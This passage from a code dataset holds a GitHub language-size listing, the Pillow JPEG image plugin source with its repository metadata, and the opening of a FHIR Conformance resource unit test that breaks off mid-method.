{
"name": "GLSL",
"bytes": "450"
},
{
"name": "Gnuplot",
"bytes": "11501"
},
{
"name": "Go",
"bytes": "5444"
},
{
"name": "Golo",
"bytes": "1649"
},
{
"name": "Gosu",
"bytes": "2853"
},
{
"name": "Groff",
"bytes": "3458639"
},
{
"name": "Groovy",
"bytes": "2586"
},
{
"name": "HTML",
"bytes": "92126540"
},
{
"name": "Haskell",
"bytes": "49593"
},
{
"name": "Haxe",
"bytes": "16812"
},
{
"name": "Hy",
"bytes": "7237"
},
{
"name": "IDL",
"bytes": "2098"
},
{
"name": "Idris",
"bytes": "2771"
},
{
"name": "Inform 7",
"bytes": "1944"
},
{
"name": "Inno Setup",
"bytes": "18796"
},
{
"name": "Ioke",
"bytes": "469"
},
{
"name": "Isabelle",
"bytes": "21392"
},
{
"name": "Jasmin",
"bytes": "9428"
},
{
"name": "Java",
"bytes": "4040623"
},
{
"name": "JavaScript",
"bytes": "223927"
},
{
"name": "Julia",
"bytes": "27687"
},
{
"name": "KiCad",
"bytes": "475"
},
{
"name": "Kotlin",
"bytes": "971"
},
{
"name": "LSL",
"bytes": "160"
},
{
"name": "Lasso",
"bytes": "18650"
},
{
"name": "Lean",
"bytes": "6921"
},
{
"name": "Limbo",
"bytes": "9891"
},
{
"name": "Liquid",
"bytes": "862"
},
{
"name": "LiveScript",
"bytes": "972"
},
{
"name": "Logos",
"bytes": "19509"
},
{
"name": "Logtalk",
"bytes": "7260"
},
{
"name": "Lua",
"bytes": "8677"
},
{
"name": "Makefile",
"bytes": "2053844"
},
{
"name": "Mask",
"bytes": "815"
},
{
"name": "Mathematica",
"bytes": "191"
},
{
"name": "Max",
"bytes": "296"
},
{
"name": "Modelica",
"bytes": "6213"
},
{
"name": "Modula-2",
"bytes": "23838"
},
{
"name": "Module Management System",
"bytes": "14798"
},
{
"name": "Monkey",
"bytes": "2587"
},
{
"name": "Moocode",
"bytes": "3343"
},
{
"name": "MoonScript",
"bytes": "14862"
},
{
"name": "Myghty",
"bytes": "3939"
},
{
"name": "NSIS",
"bytes": "7663"
},
{
"name": "Nemerle",
"bytes": "1517"
},
{
"name": "NewLisp",
"bytes": "42726"
},
{
"name": "Nimrod",
"bytes": "37191"
},
{
"name": "Nit",
"bytes": "55581"
},
{
"name": "Nix",
"bytes": "2448"
},
{
"name": "OCaml",
"bytes": "42416"
},
{
"name": "Objective-C",
"bytes": "104883"
},
{
"name": "Objective-J",
"bytes": "15340"
},
{
"name": "Opa",
"bytes": "172"
},
{
"name": "OpenEdge ABL",
"bytes": "49943"
},
{
"name": "PAWN",
"bytes": "6555"
},
{
"name": "PHP",
"bytes": "68611"
},
{
"name": "PLSQL",
"bytes": "45772"
},
{
"name": "Pan",
"bytes": "1241"
},
{
"name": "Pascal",
"bytes": "349743"
},
{
"name": "Perl",
"bytes": "5931502"
},
{
"name": "Perl6",
"bytes": "113623"
},
{
"name": "PigLatin",
"bytes": "6657"
},
{
"name": "Pike",
"bytes": "8479"
},
{
"name": "PostScript",
"bytes": "18216"
},
{
"name": "PowerShell",
"bytes": "14236"
},
{
"name": "Prolog",
"bytes": "43750"
},
{
"name": "Protocol Buffer",
"bytes": "3401"
},
{
"name": "Puppet",
"bytes": "130"
},
{
"name": "Python",
"bytes": "122886305"
},
{
"name": "QML",
"bytes": "3912"
},
{
"name": "R",
"bytes": "49247"
},
{
"name": "Racket",
"bytes": "11341"
},
{
"name": "Rebol",
"bytes": "17708"
},
{
"name": "Red",
"bytes": "10536"
},
{
"name": "Redcode",
"bytes": "830"
},
{
"name": "Ruby",
"bytes": "91403"
},
{
"name": "Rust",
"bytes": "6788"
},
{
"name": "SAS",
"bytes": "15603"
},
{
"name": "SaltStack",
"bytes": "1040"
},
{
"name": "Scala",
"bytes": "730"
},
{
"name": "Scheme",
"bytes": "50346"
},
{
"name": "Scilab",
"bytes": "943"
},
{
"name": "Shell",
"bytes": "2925518"
},
{
"name": "ShellSession",
"bytes": "320"
},
{
"name": "Smali",
"bytes": "832"
},
{
"name": "Smalltalk",
"bytes": "158636"
},
{
"name": "Smarty",
"bytes": "523"
},
{
"name": "SourcePawn",
"bytes": "130"
},
{
"name": "Standard ML",
"bytes": "36869"
},
{
"name": "Swift",
"bytes": "2035"
},
{
"name": "SystemVerilog",
"bytes": "265"
},
{
"name": "Tcl",
"bytes": "6077233"
},
{
"name": "TeX",
"bytes": "487999"
},
{
"name": "Tea",
"bytes": "391"
},
{
"name": "TypeScript",
"bytes": "535"
},
{
"name": "VHDL",
"bytes": "4446"
},
{
"name": "VimL",
"bytes": "32053"
},
{
"name": "Visual Basic",
"bytes": "19441"
},
{
"name": "XQuery",
"bytes": "4289"
},
{
"name": "XS",
"bytes": "178055"
},
{
"name": "XSLT",
"bytes": "1995174"
},
{
"name": "Xtend",
"bytes": "727"
},
{
"name": "Yacc",
"bytes": "25665"
},
{
"name": "Zephir",
"bytes": "485"
},
{
"name": "eC",
"bytes": "31545"
},
{
"name": "mupad",
"bytes": "2442"
},
{
"name": "nesC",
"bytes": "23697"
},
{
"name": "xBase",
"bytes": "3349"
}
],
"symlink_target": ""
} |
import array
import struct
import io
import warnings
from struct import unpack_from
from PIL import Image, ImageFile, TiffImagePlugin, _binary
from PIL.JpegPresets import presets
from PIL._util import isStringType
i8 = _binary.i8
o8 = _binary.o8
i16 = _binary.i16be
i32 = _binary.i32be
__version__ = "0.6"
#
# Parser
def Skip(self, marker):
n = i16(self.fp.read(2))-2
ImageFile._safe_read(self.fp, n)
def APP(self, marker):
#
# Application marker. Store these in the APP dictionary.
# Also look for well-known application markers.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
app = "APP%d" % (marker & 15)
self.app[app] = s # compatibility
self.applist.append((app, s))
if marker == 0xFFE0 and s[:4] == b"JFIF":
# extract JFIF information
self.info["jfif"] = version = i16(s, 5) # version
self.info["jfif_version"] = divmod(version, 256)
# extract JFIF properties
try:
jfif_unit = i8(s[7])
jfif_density = i16(s, 8), i16(s, 10)
except:
pass
else:
if jfif_unit == 1:
self.info["dpi"] = jfif_density
self.info["jfif_unit"] = jfif_unit
self.info["jfif_density"] = jfif_density
elif marker == 0xFFE1 and s[:5] == b"Exif\0":
# extract Exif information (incomplete)
self.info["exif"] = s # FIXME: value will change
elif marker == 0xFFE2 and s[:5] == b"FPXR\0":
# extract FlashPix information (incomplete)
self.info["flashpix"] = s # FIXME: value will change
elif marker == 0xFFE2 and s[:12] == b"ICC_PROFILE\0":
# Since an ICC profile can be larger than the maximum size of
# a JPEG marker (64K), we need provisions to split it into
# multiple markers. The format defined by the ICC specifies
# one or more APP2 markers containing the following data:
# Identifying string ASCII "ICC_PROFILE\0" (12 bytes)
# Marker sequence number 1, 2, etc (1 byte)
# Number of markers Total of APP2's used (1 byte)
# Profile data (remainder of APP2 data)
# Decoders should use the marker sequence numbers to
# reassemble the profile, rather than assuming that the APP2
# markers appear in the correct sequence.
self.icclist.append(s)
elif marker == 0xFFEE and s[:5] == b"Adobe":
self.info["adobe"] = i16(s, 5)
# extract Adobe custom properties
try:
adobe_transform = i8(s[1])
except:
pass
else:
self.info["adobe_transform"] = adobe_transform
elif marker == 0xFFE2 and s[:4] == b"MPF\0":
# extract MPO information
self.info["mp"] = s[4:]
# offset is current location minus buffer size
# plus constant header size
self.info["mpoffset"] = self.fp.tell() - n + 4
def COM(self, marker):
#
# Comment marker. Store these in the APP dictionary.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
self.app["COM"] = s # compatibility
self.applist.append(("COM", s))
def SOF(self, marker):
#
# Start of frame marker. Defines the size and mode of the
# image. JPEG is colour blind, so we use some simple
# heuristics to map the number of layers to an appropriate
# mode. Note that this could be made a bit brighter, by
# looking for JFIF and Adobe APP markers.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
self.size = i16(s[3:]), i16(s[1:])
self.bits = i8(s[0])
if self.bits != 8:
raise SyntaxError("cannot handle %d-bit layers" % self.bits)
self.layers = i8(s[5])
if self.layers == 1:
self.mode = "L"
elif self.layers == 3:
self.mode = "RGB"
elif self.layers == 4:
self.mode = "CMYK"
else:
raise SyntaxError("cannot handle %d-layer images" % self.layers)
if marker in [0xFFC2, 0xFFC6, 0xFFCA, 0xFFCE]:
self.info["progressive"] = self.info["progression"] = 1
if self.icclist:
# fixup icc profile
self.icclist.sort() # sort by sequence number
if i8(self.icclist[0][13]) == len(self.icclist):
profile = []
for p in self.icclist:
profile.append(p[14:])
icc_profile = b"".join(profile)
else:
icc_profile = None # wrong number of fragments
self.info["icc_profile"] = icc_profile
self.icclist = None
for i in range(6, len(s), 3):
t = s[i:i+3]
# 4-tuples: id, vsamp, hsamp, qtable
self.layer.append((t[0], i8(t[1])//16, i8(t[1]) & 15, i8(t[2])))
def DQT(self, marker):
#
# Define quantization table. Support baseline 8-bit tables
# only. Note that there might be more than one table in
# each marker.
# FIXME: The quantization tables can be used to estimate the
# compression quality.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
while len(s):
if len(s) < 65:
raise SyntaxError("bad quantization table marker")
v = i8(s[0])
if v//16 == 0:
self.quantization[v & 15] = array.array("B", s[1:65])
s = s[65:]
else:
return # FIXME: add code to read 16-bit tables!
# raise SyntaxError, "bad quantization table element size"
#
# JPEG marker table
MARKER = {
0xFFC0: ("SOF0", "Baseline DCT", SOF),
0xFFC1: ("SOF1", "Extended Sequential DCT", SOF),
0xFFC2: ("SOF2", "Progressive DCT", SOF),
0xFFC3: ("SOF3", "Spatial lossless", SOF),
0xFFC4: ("DHT", "Define Huffman table", Skip),
0xFFC5: ("SOF5", "Differential sequential DCT", SOF),
0xFFC6: ("SOF6", "Differential progressive DCT", SOF),
0xFFC7: ("SOF7", "Differential spatial", SOF),
0xFFC8: ("JPG", "Extension", None),
0xFFC9: ("SOF9", "Extended sequential DCT (AC)", SOF),
0xFFCA: ("SOF10", "Progressive DCT (AC)", SOF),
0xFFCB: ("SOF11", "Spatial lossless DCT (AC)", SOF),
0xFFCC: ("DAC", "Define arithmetic coding conditioning", Skip),
0xFFCD: ("SOF13", "Differential sequential DCT (AC)", SOF),
0xFFCE: ("SOF14", "Differential progressive DCT (AC)", SOF),
0xFFCF: ("SOF15", "Differential spatial (AC)", SOF),
0xFFD0: ("RST0", "Restart 0", None),
0xFFD1: ("RST1", "Restart 1", None),
0xFFD2: ("RST2", "Restart 2", None),
0xFFD3: ("RST3", "Restart 3", None),
0xFFD4: ("RST4", "Restart 4", None),
0xFFD5: ("RST5", "Restart 5", None),
0xFFD6: ("RST6", "Restart 6", None),
0xFFD7: ("RST7", "Restart 7", None),
0xFFD8: ("SOI", "Start of image", None),
0xFFD9: ("EOI", "End of image", None),
0xFFDA: ("SOS", "Start of scan", Skip),
0xFFDB: ("DQT", "Define quantization table", DQT),
0xFFDC: ("DNL", "Define number of lines", Skip),
0xFFDD: ("DRI", "Define restart interval", Skip),
0xFFDE: ("DHP", "Define hierarchical progression", SOF),
0xFFDF: ("EXP", "Expand reference component", Skip),
0xFFE0: ("APP0", "Application segment 0", APP),
0xFFE1: ("APP1", "Application segment 1", APP),
0xFFE2: ("APP2", "Application segment 2", APP),
0xFFE3: ("APP3", "Application segment 3", APP),
0xFFE4: ("APP4", "Application segment 4", APP),
0xFFE5: ("APP5", "Application segment 5", APP),
0xFFE6: ("APP6", "Application segment 6", APP),
0xFFE7: ("APP7", "Application segment 7", APP),
0xFFE8: ("APP8", "Application segment 8", APP),
0xFFE9: ("APP9", "Application segment 9", APP),
0xFFEA: ("APP10", "Application segment 10", APP),
0xFFEB: ("APP11", "Application segment 11", APP),
0xFFEC: ("APP12", "Application segment 12", APP),
0xFFED: ("APP13", "Application segment 13", APP),
0xFFEE: ("APP14", "Application segment 14", APP),
0xFFEF: ("APP15", "Application segment 15", APP),
0xFFF0: ("JPG0", "Extension 0", None),
0xFFF1: ("JPG1", "Extension 1", None),
0xFFF2: ("JPG2", "Extension 2", None),
0xFFF3: ("JPG3", "Extension 3", None),
0xFFF4: ("JPG4", "Extension 4", None),
0xFFF5: ("JPG5", "Extension 5", None),
0xFFF6: ("JPG6", "Extension 6", None),
0xFFF7: ("JPG7", "Extension 7", None),
0xFFF8: ("JPG8", "Extension 8", None),
0xFFF9: ("JPG9", "Extension 9", None),
0xFFFA: ("JPG10", "Extension 10", None),
0xFFFB: ("JPG11", "Extension 11", None),
0xFFFC: ("JPG12", "Extension 12", None),
0xFFFD: ("JPG13", "Extension 13", None),
0xFFFE: ("COM", "Comment", COM)
}
def _accept(prefix):
return prefix[0:1] == b"\377"
##
# Image plugin for JPEG and JFIF images.
class JpegImageFile(ImageFile.ImageFile):
format = "JPEG"
format_description = "JPEG (ISO 10918)"
def _open(self):
s = self.fp.read(1)
if i8(s) != 255:
raise SyntaxError("not a JPEG file")
# Create attributes
self.bits = self.layers = 0
# JPEG specifics (internal)
self.layer = []
self.huffman_dc = {}
self.huffman_ac = {}
self.quantization = {}
self.app = {} # compatibility
self.applist = []
self.icclist = []
while True:
i = i8(s)
if i == 0xFF:
s = s + self.fp.read(1)
i = i16(s)
else:
# Skip non-0xFF junk
s = self.fp.read(1)
continue
if i in MARKER:
name, description, handler = MARKER[i]
# print hex(i), name, description
if handler is not None:
handler(self, i)
if i == 0xFFDA: # start of scan
rawmode = self.mode
if self.mode == "CMYK":
rawmode = "CMYK;I" # assume adobe conventions
self.tile = [("jpeg", (0, 0) + self.size, 0,
(rawmode, ""))]
# self.__offset = self.fp.tell()
break
s = self.fp.read(1)
elif i == 0 or i == 0xFFFF:
# padded marker or junk; move on
s = b"\xff"
elif i == 0xFF00: # Skip extraneous data (escaped 0xFF)
s = self.fp.read(1)
else:
raise SyntaxError("no marker found")
def draft(self, mode, size):
if len(self.tile) != 1:
return
d, e, o, a = self.tile[0]
scale = 0
if a[0] == "RGB" and mode in ["L", "YCbCr"]:
self.mode = mode
a = mode, ""
if size:
scale = max(self.size[0] // size[0], self.size[1] // size[1])
for s in [8, 4, 2, 1]:
if scale >= s:
break
e = e[0], e[1], (e[2]-e[0]+s-1)//s+e[0], (e[3]-e[1]+s-1)//s+e[1]
self.size = ((self.size[0]+s-1)//s, (self.size[1]+s-1)//s)
scale = s
self.tile = [(d, e, o, a)]
self.decoderconfig = (scale, 0)
return self
def load_djpeg(self):
# ALTERNATIVE: handle JPEGs via the IJG command line utilities
import subprocess
import tempfile
import os
f, path = tempfile.mkstemp()
os.close(f)
if os.path.exists(self.filename):
subprocess.check_call(["djpeg", "-outfile", path, self.filename])
else:
raise ValueError("Invalid Filename")
try:
_im = Image.open(path)
_im.load()
self.im = _im.im
finally:
try:
os.unlink(path)
except OSError:
pass
self.mode = self.im.mode
self.size = self.im.size
self.tile = []
def _getexif(self):
return _getexif(self)
def _getmp(self):
return _getmp(self)
def _fixup_dict(src_dict):
# Helper function for _getexif()
# returns a dict with any single item tuples/lists as individual values
def _fixup(value):
try:
if len(value) == 1 and not isinstance(value, dict):
return value[0]
except: pass
return value
return dict([(k, _fixup(v)) for k, v in src_dict.items()])
def _getexif(self):
# Extract EXIF information. This method is highly experimental,
# and is likely to be replaced with something better in a future
# version.
# The EXIF record consists of a TIFF file embedded in a JPEG
# application marker (!).
try:
data = self.info["exif"]
except KeyError:
return None
file = io.BytesIO(data[6:])
head = file.read(8)
# process dictionary
info = TiffImagePlugin.ImageFileDirectory_v1(head)
info.load(file)
exif = dict(_fixup_dict(info))
# get exif extension
try:
# exif field 0x8769 is an offset pointer to the location
# of the nested embedded exif ifd.
# It should be a long, but may be corrupted.
file.seek(exif[0x8769])
except (KeyError, TypeError):
pass
else:
info = TiffImagePlugin.ImageFileDirectory_v1(head)
info.load(file)
exif.update(_fixup_dict(info))
# get gpsinfo extension
try:
# exif field 0x8825 is an offset pointer to the location
# of the nested embedded gps exif ifd.
# It should be a long, but may be corrupted.
file.seek(exif[0x8825])
except (KeyError, TypeError):
pass
else:
info = TiffImagePlugin.ImageFileDirectory_v1(head)
info.load(file)
exif[0x8825] = _fixup_dict(info)
return exif
def _getmp(self):
# Extract MP information. This method was inspired by the "highly
# experimental" _getexif version that's been in use for years now,
# itself based on the ImageFileDirectory class in the TIFF plug-in.
# The MP record essentially consists of a TIFF file embedded in a JPEG
# application marker.
try:
data = self.info["mp"]
except KeyError:
return None
file_contents = io.BytesIO(data)
head = file_contents.read(8)
endianness = '>' if head[:4] == b'\x4d\x4d\x00\x2a' else '<'
# process dictionary
try:
info = TiffImagePlugin.ImageFileDirectory_v2(head)
info.load(file_contents)
mp = dict(info)
except:
raise SyntaxError("malformed MP Index (unreadable directory)")
# it's an error not to have a number of images
try:
quant = mp[0xB001]
except KeyError:
raise SyntaxError("malformed MP Index (no number of images)")
# get MP entries
mpentries = []
try:
rawmpentries = mp[0xB002]
for entrynum in range(0, quant):
unpackedentry = unpack_from(
'{0}LLLHH'.format(endianness), rawmpentries, entrynum * 16)
labels = ('Attribute', 'Size', 'DataOffset', 'EntryNo1',
'EntryNo2')
mpentry = dict(zip(labels, unpackedentry))
mpentryattr = {
'DependentParentImageFlag': bool(mpentry['Attribute'] &
(1 << 31)),
'DependentChildImageFlag': bool(mpentry['Attribute'] &
(1 << 30)),
'RepresentativeImageFlag': bool(mpentry['Attribute'] &
(1 << 29)),
'Reserved': (mpentry['Attribute'] & (3 << 27)) >> 27,
'ImageDataFormat': (mpentry['Attribute'] & (7 << 24)) >> 24,
'MPType': mpentry['Attribute'] & 0x00FFFFFF
}
if mpentryattr['ImageDataFormat'] == 0:
mpentryattr['ImageDataFormat'] = 'JPEG'
else:
raise SyntaxError("unsupported picture format in MPO")
mptypemap = {
0x000000: 'Undefined',
0x010001: 'Large Thumbnail (VGA Equivalent)',
0x010002: 'Large Thumbnail (Full HD Equivalent)',
0x020001: 'Multi-Frame Image (Panorama)',
0x020002: 'Multi-Frame Image: (Disparity)',
0x020003: 'Multi-Frame Image: (Multi-Angle)',
0x030000: 'Baseline MP Primary Image'
}
mpentryattr['MPType'] = mptypemap.get(mpentryattr['MPType'],
'Unknown')
mpentry['Attribute'] = mpentryattr
mpentries.append(mpentry)
mp[0xB002] = mpentries
except KeyError:
raise SyntaxError("malformed MP Index (bad MP Entry)")
# Next we should try and parse the individual image unique ID list;
# we don't because I've never seen this actually used in a real MPO
# file and so can't test it.
return mp
# --------------------------------------------------------------------
# stuff to save JPEG files
RAWMODE = {
"1": "L",
"L": "L",
"RGB": "RGB",
"RGBA": "RGB",
"RGBX": "RGB",
"CMYK": "CMYK;I", # assume adobe conventions
"YCbCr": "YCbCr",
}
zigzag_index = (0, 1, 5, 6, 14, 15, 27, 28,
2, 4, 7, 13, 16, 26, 29, 42,
3, 8, 12, 17, 25, 30, 41, 43,
9, 11, 18, 24, 31, 40, 44, 53,
10, 19, 23, 32, 39, 45, 52, 54,
20, 22, 33, 38, 46, 51, 55, 60,
21, 34, 37, 47, 50, 56, 59, 61,
35, 36, 48, 49, 57, 58, 62, 63)
samplings = {(1, 1, 1, 1, 1, 1): 0,
(2, 1, 1, 1, 1, 1): 1,
(2, 2, 1, 1, 1, 1): 2,
}
def convert_dict_qtables(qtables):
qtables = [qtables[key] for key in range(len(qtables)) if key in qtables]
for idx, table in enumerate(qtables):
qtables[idx] = [table[i] for i in zigzag_index]
return qtables
def get_sampling(im):
# There's no subsampling when image have only 1 layer
# (grayscale images) or when they are CMYK (4 layers),
# so set subsampling to default value.
#
# NOTE: currently Pillow can't encode JPEG to YCCK format.
# If YCCK support is added in the future, subsampling code will have
# to be updated (here and in JpegEncode.c) to deal with 4 layers.
if not hasattr(im, 'layers') or im.layers in (1, 4):
return -1
sampling = im.layer[0][1:3] + im.layer[1][1:3] + im.layer[2][1:3]
return samplings.get(sampling, -1)
def _save(im, fp, filename):
try:
rawmode = RAWMODE[im.mode]
except KeyError:
raise IOError("cannot write mode %s as JPEG" % im.mode)
if im.mode == 'RGBA':
warnings.warn(
'You are saving RGBA image as JPEG. The alpha channel will be '
'discarded. This conversion is deprecated and will be disabled '
'in Pillow 3.7. Please, convert the image to RGB explicitly.',
DeprecationWarning
)
info = im.encoderinfo
dpi = [int(round(x)) for x in info.get("dpi", (0, 0))]
quality = info.get("quality", 0)
subsampling = info.get("subsampling", -1)
qtables = info.get("qtables")
if quality == "keep":
quality = 0
subsampling = "keep"
qtables = "keep"
elif quality in presets:
preset = presets[quality]
quality = 0
subsampling = preset.get('subsampling', -1)
qtables = preset.get('quantization')
elif not isinstance(quality, int):
raise ValueError("Invalid quality setting")
else:
if subsampling in presets:
subsampling = presets[subsampling].get('subsampling', -1)
if isStringType(qtables) and qtables in presets:
qtables = presets[qtables].get('quantization')
if subsampling == "4:4:4":
subsampling = 0
elif subsampling == "4:2:2":
subsampling = 1
elif subsampling == "4:1:1":
subsampling = 2
elif subsampling == "keep":
if im.format != "JPEG":
raise ValueError(
"Cannot use 'keep' when original image is not a JPEG")
subsampling = get_sampling(im)
def validate_qtables(qtables):
if qtables is None:
return qtables
if isStringType(qtables):
try:
lines = [int(num) for line in qtables.splitlines()
for num in line.split('#', 1)[0].split()]
except ValueError:
raise ValueError("Invalid quantization table")
else:
qtables = [lines[s:s+64] for s in range(0, len(lines), 64)]
if isinstance(qtables, (tuple, list, dict)):
if isinstance(qtables, dict):
qtables = convert_dict_qtables(qtables)
elif isinstance(qtables, tuple):
qtables = list(qtables)
if not (0 < len(qtables) < 5):
raise ValueError("None or too many quantization tables")
for idx, table in enumerate(qtables):
try:
if len(table) != 64:
raise
table = array.array('B', table)
except TypeError:
raise ValueError("Invalid quantization table")
else:
qtables[idx] = list(table)
return qtables
if qtables == "keep":
if im.format != "JPEG":
raise ValueError(
"Cannot use 'keep' when original image is not a JPEG")
qtables = getattr(im, "quantization", None)
qtables = validate_qtables(qtables)
extra = b""
icc_profile = info.get("icc_profile")
if icc_profile:
ICC_OVERHEAD_LEN = 14
MAX_BYTES_IN_MARKER = 65533
MAX_DATA_BYTES_IN_MARKER = MAX_BYTES_IN_MARKER - ICC_OVERHEAD_LEN
markers = []
while icc_profile:
markers.append(icc_profile[:MAX_DATA_BYTES_IN_MARKER])
icc_profile = icc_profile[MAX_DATA_BYTES_IN_MARKER:]
i = 1
for marker in markers:
size = struct.pack(">H", 2 + ICC_OVERHEAD_LEN + len(marker))
extra += (b"\xFF\xE2" + size + b"ICC_PROFILE\0" + o8(i) +
o8(len(markers)) + marker)
i += 1
# "progressive" is the official name, but older documentation
# says "progression"
# FIXME: issue a warning if the wrong form is used (post-1.1.7)
progressive = info.get("progressive", False) or\
info.get("progression", False)
optimize = info.get("optimize", False)
# get keyword arguments
im.encoderconfig = (
quality,
progressive,
info.get("smooth", 0),
optimize,
info.get("streamtype", 0),
dpi[0], dpi[1],
subsampling,
qtables,
extra,
info.get("exif", b"")
)
# if we optimize, libjpeg needs a buffer big enough to hold the whole image
# in a shot. Guessing on the size, at im.size bytes. (raw pizel size is
# channels*size, this is a value that's been used in a django patch.
# https://github.com/matthewwithanm/django-imagekit/issues/50
bufsize = 0
if optimize or progressive:
# keep sets quality to 0, but the actual value may be high.
if quality >= 95 or quality == 0:
bufsize = 2 * im.size[0] * im.size[1]
else:
bufsize = im.size[0] * im.size[1]
# The exif info needs to be written as one block, + APP1, + one spare byte.
# Ensure that our buffer is big enough
bufsize = max(ImageFile.MAXBLOCK, bufsize, len(info.get("exif", b"")) + 5)
ImageFile._save(im, fp, [("jpeg", (0, 0)+im.size, 0, rawmode)], bufsize)
def _save_cjpeg(im, fp, filename):
# ALTERNATIVE: handle JPEGs via the IJG command line utilities.
import os
import subprocess
tempfile = im._dump()
subprocess.check_call(["cjpeg", "-outfile", filename, tempfile])
try:
os.unlink(tempfile)
except OSError:
pass
##
# Factory for making JPEG and MPO instances
def jpeg_factory(fp=None, filename=None):
im = JpegImageFile(fp, filename)
try:
mpheader = im._getmp()
if mpheader[45057] > 1:
# It's actually an MPO
from .MpoImagePlugin import MpoImageFile
im = MpoImageFile(fp, filename)
except (TypeError, IndexError):
# It is really a JPEG
pass
except SyntaxError:
warnings.warn("Image appears to be a malformed MPO file, it will be "
"interpreted as a base JPEG file")
return im
# -------------------------------------------------------------------q-
# Registry stuff
Image.register_open(JpegImageFile.format, jpeg_factory, _accept)
Image.register_save(JpegImageFile.format, _save)
Image.register_extension(JpegImageFile.format, ".jfif")
Image.register_extension(JpegImageFile.format, ".jpe")
Image.register_extension(JpegImageFile.format, ".jpg")
Image.register_extension(JpegImageFile.format, ".jpeg")
Image.register_mime(JpegImageFile.format, "image/jpeg")
| {
"content_hash": "3f69d50b742c8e21da15c2c58af1a675",
"timestamp": "",
"source": "github",
"line_count": 736,
"max_line_length": 79,
"avg_line_length": 34.08423913043478,
"alnum_prop": 0.555608706051184,
"repo_name": "Ali-aqrabawi/ezclinic",
"id": "ef229e61157cc2a03c538b9d4d72beb35507674a",
"size": "26462",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "lib/PIL/JpegImagePlugin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "95195"
},
{
"name": "HTML",
"bytes": "233888"
},
{
"name": "JavaScript",
"bytes": "3747108"
},
{
"name": "Python",
"bytes": "6361738"
}
],
"symlink_target": ""
} |
import io
import json
import os
import unittest
from . import conformance
from .fhirdate import FHIRDate
class ConformanceTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Conformance", js["resourceType"])
return conformance.Conformance(js)
def testConformance1(self):
inst = self.instantiate_from("conformance-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Conformance instance")
self.implConformance1(inst)
js = inst.as_json()
self.assertEqual("Conformance", js["resourceType"])
inst2 = conformance.Conformance(js)
self.implConformance1(inst2)
def implConformance1(self, inst):
self.assertEqual(inst.acceptUnknown, "both")
self.assertEqual(inst.contact[0].name, "System Administrator")
self.assertEqual(inst.contact[0].telecom[0].system, "email")
self.assertEqual(inst.contact[0].telecom[0].value, "wile@acme.org")
self.assertEqual(inst.copyright, "Copyright © Acme Healthcare and GoodCorp EHR Systems")
self.assertEqual(inst.date.date, FHIRDate("2012-01-04").date)
self.assertEqual(inst.date.as_json(), "2012-01-04")
self.assertEqual(inst.description, "This is the FHIR conformance statement for the main EHR at ACME for the private interface - it does not describe the public interface")
self.assertEqual(inst.document[0].documentation, "Basic rules for all documents in the EHR system")
self.assertEqual(inst.document[0].mode, "consumer")
self.assertTrue(inst.experimental)
self.assertEqual(inst.fhirVersion, "1.0.0")
self.assertEqual(inst.format[0], "xml")
self.assertEqual(inst.format[1], "json")
self.assertEqual(inst.id, "example")
self.assertEqual(inst.implementation.description, "main EHR at ACME")
self.assertEqual(inst.implementation.url, "http://10.2.3.4/fhir")
self.assertEqual(inst.kind, "instance")
self.assertEqual(inst.messaging[0].documentation, "ADT A08 equivalent for external system notifications")
self.assertEqual(inst.messaging[0].endpoint[0].address, "mllp:10.1.1.10:9234")
self.assertEqual(inst.messaging[0].endpoint[0].protocol.code, "mllp")
self.assertEqual(inst.messaging[0].endpoint[0].protocol.system, "http://hl7.org/fhir/message-transport")
self.assertEqual(inst.messaging[0].event[0].category, "Consequence")
self.assertEqual(inst.messaging[0].event[0].code.code, "admin-notify")
self.assertEqual(inst.messaging[0].event[0].code.system, "http://hl7.org/fhir/message-type")
self.assertEqual(inst.messaging[0].event[0].documentation, "Notification of an update to a patient resource. changing the links is not supported")
self.assertEqual(inst.messaging[0].event[0].focus, "Patient")
self.assertEqual(inst.messaging[0].event[0].mode, "receiver")
self.assertEqual(inst.messaging[0].reliableCache, 30)
self.assertEqual(inst.name, "ACME EHR Conformance statement")
self.assertEqual(inst.publisher, "ACME Corporation")
self.assertEqual(inst.requirements, "Main EHR conformance statement, published for contracting and operational support")
self.assertEqual(inst.rest[0].compartment[0], "http://hl7.org/fhir/compartment/Patient")
self.assertEqual(inst.rest[0].documentation, "Main FHIR endpoint for acem health")
self.assertEqual(inst.rest[0].interaction[0].code, "transaction")
self.assertEqual(inst.rest[0].interaction[1].code, "history-system")
self.assertEqual(inst.rest[0].mode, "server")
self.assertTrue(inst.rest[0].resource[0].conditionalCreate)
self.assertEqual(inst.rest[0].resource[0].conditionalDelete, "not-supported")
self.assertFalse(inst.rest[0].resource[0].conditionalUpdate)
self.assertEqual(inst.rest[0].resource[0].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[0].interaction[1].code, "vread")
self.assertEqual(inst.rest[0].resource[0].interaction[1].documentation, "Only supported for patient records since 12-Dec 2012")
self.assertEqual(inst.rest[0].resource[0].interaction[2].code, "update")
self.assertEqual(inst.rest[0].resource[0].interaction[3].code, "history-instance")
self.assertEqual(inst.rest[0].resource[0].interaction[4].code, "create")
self.assertEqual(inst.rest[0].resource[0].interaction[5].code, "history-type")
self.assertTrue(inst.rest[0].resource[0].readHistory)
self.assertEqual(inst.rest[0].resource[0].searchInclude[0], "Organization")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].definition, "http://hl7.org/fhir/SearchParameter/Patient-identifier")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].documentation, "Only supports search by institution MRN")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].modifier[0], "missing")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].name, "identifier")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].type, "token")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].chain[0], "name")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].chain[1], "identifier")
